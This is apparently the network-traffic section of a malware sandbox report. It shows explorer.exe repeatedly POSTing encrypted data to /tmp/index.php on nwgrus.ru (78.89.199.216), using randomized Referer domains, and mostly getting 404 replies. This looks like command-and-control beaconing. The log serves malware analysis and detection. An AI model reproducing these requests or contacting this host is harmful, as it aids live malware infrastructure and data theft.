                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.44973778.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:34.020936966 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://yagmckrhrxidkkt.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 261
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:34.020936966 CEST261OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 46 20 b4 af
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuF \2F7~|I+|aOYUSQ=y!&@`8@IC87tA)%odYPN)~|sB|Csr;c--{
                                    Oct 13, 2024 17:02:35.259593964 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:35 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.44973878.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:35.269042015 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://dricwaygwumvuqyx.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 183
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:35.269079924 CEST183OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 44 14 b1 8e
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuDn{thils%*-k;SpS6_RGI+TQP23(`p= k>s
                                    Oct 13, 2024 17:02:36.674861908 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:36 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.44973978.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:36.688941956 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://dvywoyvbihbnwwjn.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 282
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:36.688975096 CEST282OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5b 43 e9 8c
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu[CBzam.ax7YJ<I/DP#*#SI&Q4GKL'>.T&D(%Ee;%hYl8Qt
                                    Oct 13, 2024 17:02:37.879072905 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:37 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.44974078.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:37.888127089 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mbmyqakevfccgv.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 289
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:37.888159037 CEST289OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3b 14 cc fb
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu;QAhqDhu; .`h=D&:jXCsGP11NZ)K]. SV*VR.moB0Wji^<yX
                                    Oct 13, 2024 17:02:39.110152006 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:38 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.44974178.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:39.118288040 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://clrhahncwuyc.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 305
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:39.118324041 CEST305OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5d 54 a5 9f
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu]TS@W0|^Q[kem6-JW?Vy w?=2C0gY%6dav>:/crV1Mt@o=r@.
                                    Oct 13, 2024 17:02:40.314954042 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:40 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.44974278.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:40.323925018 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://fxjvbidmvidvfvuu.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 218
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:40.323961020 CEST218OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3e 14 e8 f5
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu>\wk=0o+w[~`rTM^oFMXxSN^&!%+0!eHC%;IT|u
                                    Oct 13, 2024 17:02:41.718607903 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:41 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.44974378.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:41.729180098 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qfasgfhewcyw.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 217
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:41.729296923 CEST217OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 45 3f a0 8c
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuE?&R2hPFatKdO?]2{PKKqE#bl}0K`MD1qo!vK3s"
                                    Oct 13, 2024 17:02:43.127505064 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:42 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.44974478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:43.191849947 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ajnjimgspja.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 339
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:43.191849947 CEST339OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 22 29 b1 f1
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu")Naz"[#f]\+([?l1U'F-0-j8<(p2_6pA<+,?u4:Mq=C_f}NB*
                                    Oct 13, 2024 17:02:44.418507099 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:44 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.44974578.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:44.429153919 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://orfuocjxhujvp.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 266
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:44.429188013 CEST266OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 50 3c a8 9d
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuP<r[XrhiHRO/#OBshU[+=So97WWue xCM4SM"X>e+@(k-uimNSEnv'<&Ey
                                    Oct 13, 2024 17:02:45.651444912 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:45 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.44974678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:45.661859989 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://sukwfdfgeltdloqp.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 218
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:45.661891937 CEST218OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 38 5d b9 fb
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu8]cINe`aOG\y.6CvK&C!mL\Rl7#t@~%Yv.|J2:0 L
                                    Oct 13, 2024 17:02:46.864932060 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:46 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.44974778.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:46.882323980 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://cspwoprndoye.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 128
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:46.882323980 CEST128OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 5f 03 d0 ff
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu_n}kN:pKN0tKb:
                                    Oct 13, 2024 17:02:48.087645054 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:47 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.44974878.89.199.216802580C:\Windows\explorer.exe
